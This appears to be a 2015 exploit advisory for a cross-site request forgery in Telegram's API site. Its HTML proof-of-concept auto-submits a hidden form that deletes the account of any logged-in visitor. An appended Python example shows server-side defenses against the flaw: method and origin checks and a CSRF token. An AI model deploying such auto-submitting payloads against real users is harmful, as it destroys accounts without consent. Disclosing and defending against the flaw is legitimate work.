
Telegram API CSRF

Posted on 06 July 2015

/***********************************************************************************
** Exploit Title: Telegram API Cross Site Request Forgery
** Exploit Author: C4T
** Vendor Homepage : http://my.telegram.org
** Google Dork: none
** Date: 06/27/2015
** Tested on: Windows 7
************************************************************************************
** Exploit Code:
******************
<body onload="document.exploit.submit()">
<form name="exploit" action="https://my.telegram.org/deactivate/do_delete" id="deactivate_phone_form" onsubmit="return sendPassword(event);">
<input type="hidden" name="message" value="ExploitedByC4T">
</form>
*************************************************************************************
** Description:
******************
When a user is logged in to the Telegram API, just opening a web page containing this exploit deletes his account.
Discovered by C4T @ Ashiyane Digital Security Team.
-------------------------------------------------------
******************************************************************************************
** More Details and Explanation:
** http://hatrhyme.com/CSRFInTelegram.pdf
******************************************************************************************
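A server-side check that would refuse the forged request above, as an added example (not code from the original advisory or from Telegram). The trusted origin is taken from the PoC's form action; the `csrf_token` field name, the HMAC token scheme, the function names and the sample requests are assumptions constructed for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

# Assumed values for this sketch; a real deployment loads the key from secret storage.
SERVER_KEY = secrets.token_bytes(32)
TRUSTED_ORIGIN = "https://my.telegram.org"  # origin of the PoC's form action


def issue_csrf_token(session_id: str) -> str:
    """Token the server embeds in its own form, bound to the user's session."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def same_origin(headers: dict) -> bool:
    """Check Origin, falling back to Referer; a request carrying neither is refused."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == TRUSTED_ORIGIN


def authorize_state_change(method, headers, session_id, form):
    """Return (allowed, reason) for a destructive request such as account deletion."""
    if method != "POST":
        return False, "state change must use POST"
    if not same_origin(headers):
        return False, "cross-origin or unidentified source"
    expected = issue_csrf_token(session_id).encode()
    supplied = form.get("csrf_token", "").encode()
    if not hmac.compare_digest(supplied, expected):
        return False, "missing or invalid CSRF token"
    return True, "ok"


# Constructed sample requests (not captured traffic).
# The PoC form has no method attribute, so the browser submits it as GET.
SESSION = "constructed-session-id"
FORGED = ("GET", {"Referer": "https://attacker.example/page.html"},
          SESSION, {"message": "ExploitedByC4T"})
LEGIT = ("POST", {"Origin": TRUSTED_ORIGIN},
         SESSION, {"message": "bye", "csrf_token": issue_csrf_token(SESSION)})

if __name__ == "__main__":
    for name, req in (("forged", FORGED), ("legit", LEGIT)):
        print(name, authorize_state_change(*req))
```

Each layer rejects the forged form independently: the method check, the origin check, and the session-bound token that a third-party page cannot read or compute.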

 
